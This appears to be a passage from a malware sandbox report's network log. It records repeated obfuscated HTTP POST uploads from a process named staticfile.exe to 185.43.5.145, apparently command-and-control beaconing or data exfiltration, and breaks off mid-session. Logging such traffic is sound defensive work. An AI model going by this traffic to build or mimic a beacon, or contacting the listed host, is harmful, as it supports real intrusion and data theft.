                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:02:41.865438938 CET1048OUTData Raw: 51 55 58 5f 58 47 5a 5d 54 58 56 53 59 5d 58 57 55 5c 5c 5f 51 5b 53 5f 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QUX_XGZ]TXVSY]XWU\\_Q[S_T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C(<.>-4[!0&<1[!:4)(:[2+#4=.8["/8W+9[".Z/"
                  Dec 27, 2024 04:02:42.937947989 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:43.195390940 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:42 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  3192.168.2.549762185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:43.435369015 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1040
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:43.787308931 CET1040OUTData Raw: 54 50 5d 5c 5d 46 5a 51 54 58 56 53 59 5c 58 55 55 5d 5c 5c 51 58 53 5e 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TP]\]FZQTXVSY\XUU]\\QXS^T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$(:]?>;!,2=!;)&Y2?Y!#-:<[50R+9[".Z/
                  Dec 27, 2024 04:02:44.759114027 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:45.038430929 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:44 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  4192.168.2.549767185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:45.280735016 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:45.631140947 CET1048OUTData Raw: 54 53 5d 59 5d 44 5a 51 54 58 56 53 59 5d 58 50 55 54 5c 5d 51 50 53 5f 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TS]Y]DZQTXVSY]XPUT\]QPS_T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F+/<'511" >()18(#=,;(5Z/?:9[".Z/"


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  5192.168.2.549770185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:46.267146111 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:46.615582943 CET1328OUTData Raw: 54 56 5d 5a 5d 46 5a 5d 54 58 56 53 59 5b 58 55 55 52 5c 5c 51 59 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TV]Z]FZ]TXVSY[XUUR\\QYSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+/>_<=?!#'?\59T*"Y&;Y71S-4Z6<'(9[".Z/
                  Dec 27, 2024 04:02:47.697309971 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:47.942076921 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:47 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 24 07 20 35 3c 54 3d 02 2c 51 30 3b 26 1c 28 1f 04 5a 2c 03 31 58 3e 3e 3e 01 39 3c 2b 13 22 2c 35 5b 28 3e 24 01 33 35 24 03 21 0b 2d 5d 02 1a 20 13 36 31 3d 54 27 20 2b 5c 39 33 03 19 3e 33 03 02 27 15 3a 52 32 28 3f 54 23 1d 3d 52 27 31 3d 52 2f 24 37 12 2f 19 0d 0f 24 3a 23 5f 03 14 39 51 22 2e 0a 58 26 0f 22 5c 20 38 26 0d 36 24 25 1d 29 2b 2b 5d 2b 2b 03 02 27 32 24 12 33 03 3d 0c 2a 2a 32 52 21 5a 2b 02 3e 23 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: $ 5<T=,Q0;&(Z,1X>>>9<+",5[(>$35$!-] 61=T' +\93>3':R2(?T#=R'1=R/$7/$:#_9Q".X&"\ 8&6$%)++]++'2$3=**2R!Z+># P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  6192.168.2.549772185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:46.403728962 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:46.756097078 CET1048OUTData Raw: 54 56 58 5d 5d 48 5f 53 54 58 56 53 59 54 58 51 55 56 5c 59 51 50 53 5a 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TVX]]H_STXVSYTXQUV\YQPSZT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'F(/&]<85?%?!9*;92+4>9+"3+9[".Z/
                  Dec 27, 2024 04:02:47.792618036 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:48.029561996 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:47 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.549775185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:48.263906956 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Dec 27, 2024 04:02:48.615452051 CET1048OUTData Raw: 51 51 5d 5b 5d 45 5f 56 54 58 56 53 59 5d 58 54 55 5d 5c 57 51 5c 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QQ][]E_VTXVSY]XTU]\WQ\S]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C+1+-(",&,1!9(U=:X&+4 9U-(768R<9[".Z/"
                  Dec 27, 2024 04:02:49.633894920 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:49.878262997 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:49 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.549781185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:50.123171091 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:50.474844933 CET1048OUTData Raw: 51 57 5d 5c 58 40 5f 57 54 58 56 53 59 5f 58 51 55 54 5c 5c 51 5e 53 59 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QW]\X@_WTXVSY_XQUT\\Q^SYT_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A</-?.4""'Y%<=6'*62+,7S.8[5#+:9[".Z/*
                  Dec 27, 2024 04:02:51.487154961 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:51.730349064 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:51 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.549786185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:51.966067076 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1044
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:52.318808079 CET1044OUTData Raw: 51 56 5d 5a 58 43 5a 5c 54 58 56 53 59 5c 58 51 55 54 5c 5a 51 5c 53 53 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QV]ZXCZ\TXVSY\XQUT\ZQ\SST_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C+<.^?X$Z"W'X%?!$T>+.^%'[#%R: 5?,T(*9[".Z/6


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.549788185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:53.064042091 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:53.412385941 CET1328OUTData Raw: 51 55 58 58 58 44 5a 50 54 58 56 53 59 5f 58 53 55 51 5c 58 51 5a 53 5c 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QUXXXDZPTXVSY_XSUQ\XQZS\T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A(/%<>0\6132"#9*Y%;?X!#!R:$]"?0<9[".Z/*
                  Dec 27, 2024 04:02:54.391868114 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:54.624980927 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:54 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 02 1a 27 12 23 26 3f 0e 3d 2c 37 09 24 38 3a 1c 28 31 07 05 38 2d 36 06 2a 2d 26 00 3a 3f 09 1e 36 02 25 11 3e 3d 3f 13 30 18 3b 5a 23 31 2d 5d 02 1a 23 00 22 22 0f 56 27 33 33 13 2e 1d 21 1a 29 1d 2e 58 27 02 21 08 27 28 2b 57 20 20 35 1a 26 22 29 50 39 0a 3f 5e 2c 27 3f 0f 33 10 23 5f 03 14 3a 0f 36 07 24 59 26 0f 2e 58 20 06 3d 53 35 1d 3d 56 3d 38 05 5d 2b 5d 2e 5d 26 22 28 5d 33 2d 21 0a 3e 29 00 56 22 5a 28 1f 2a 09 20 50 21 03 22 54 0e 30 5c 53
                  Data Ascii: '#&?=,7$8:(18-6*-&:?6%>=?0;Z#1-]#""V'33.!).X'!'(+W 5&")P9?^,'?3#_:6$Y&.X =S5=V=8]+].]&"(]3-!>)V"Z(* P!"T0\S


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.549789185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:53.184561014 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:53.537337065 CET1048OUTData Raw: 51 57 58 58 5d 41 5f 56 54 58 56 53 59 5e 58 52 55 53 5c 57 51 5a 53 5e 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: QWXX]A_VTXVSY^XRUS\WQZS^T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$+<1(>#6'Z%,)[6?=8)2? 0*:[!,0W+:9[".Z/.
                  Dec 27, 2024 04:02:54.594810963 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:54.847470999 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:54 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.549795185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:55.096374035 CET395OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1044
                  Expect: 100-continue
                  Dec 27, 2024 04:02:55.443537951 CET1044OUTData Raw: 54 51 5d 5c 5d 40 5a 55 54 58 56 53 59 5c 58 56 55 55 5c 5f 51 5b 53 5b 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TQ]\]@ZUTXVSY\XVUU\_Q[S[T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'A?=(46!1?%_6)<*]>[2'X #!,;([5?8U+9[".Z/*
                  Dec 27, 2024 04:02:56.539105892 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:56.782268047 CET151INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:56 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.549801185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:57.030258894 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:57.381047010 CET1048OUTData Raw: 54 5a 58 5e 5d 42 5a 55 54 58 56 53 59 5b 58 50 55 5c 5c 5f 51 59 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TZX^]BZUTXVSY[XPU\\_QYS]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C(?(X4Z6!'%=]5:#=-'8;Z#0*-+!+(*9[".Z/
                  Dec 27, 2024 04:02:58.395751953 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:02:58.638334036 CET207INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:02:58 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Content-Length: 4
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 30 52 5e 56
                  Data Ascii: 0R^V


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.549807185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:58.873152971 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1048
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:02:59.225784063 CET1048OUTData Raw: 54 53 58 59 5d 48 5a 54 54 58 56 53 59 59 58 57 55 5c 5c 5b 51 5f 53 5d 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TSXY]HZTTXVSYYXWU\\[Q_S]T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\'C<*?>;!!'Y&?=_"8Q=]52+/##1R:;5R<:9[".Z/2


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.549809185.43.5.145804820C:\Users\user\AppData\Local\staticfile.exe
                  TimestampBytes transferredDirectionData
                  Dec 27, 2024 04:02:59.765866041 CET419OUTPOST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1
                  Content-Type: application/octet-stream
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                  Host: 185.43.5.145
                  Content-Length: 1328
                  Expect: 100-continue
                  Connection: Keep-Alive
                  Dec 27, 2024 04:03:00.119935036 CET1328OUTData Raw: 54 54 5d 53 58 47 5f 54 54 58 56 53 59 5e 58 5c 55 50 5c 5e 51 5e 53 5c 54 5f 46 5f 53 5e 5d 5a 59 59 52 58 51 5b 55 5c 5a 57 54 5c 5a 53 52 5e 54 56 5a 51 5f 53 57 52 5f 56 51 50 50 52 58 46 54 52 5c 5b 5f 5e 58 50 5b 59 5c 56 5e 52 43 5b 5b 53
                  Data Ascii: TT]SXG_TTXVSY^X\UP\^Q^S\T_F_S^]ZYYRXQ[U\ZWT\ZSR^TVZQ_SWR_VQPPRXFTR\[_^XP[Y\V^RC[[S^QVA][R[ZRYP\]UZFQ_Y^[X\X]^_ZQ\BRTQYX[VYQ\ZQGY_[T^R[XSZYV]WGZQ[X[Y[]__XUZZPXRQ[U[ARR[QU]U[ZQX^ZYX\_[\\$(/]?._5W'&1#)V=;.&8(# :.+"<#<*9[".Z/.
                  Dec 27, 2024 04:03:01.181062937 CET25INHTTP/1.1 100 Continue
                  Dec 27, 2024 04:03:01.431421041 CET380INHTTP/1.1 200 OK
                  Date: Fri, 27 Dec 2024 03:03:00 GMT
                  Server: Apache/2.4.41 (Ubuntu)
                  Vary: Accept-Encoding
                  Content-Length: 152
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
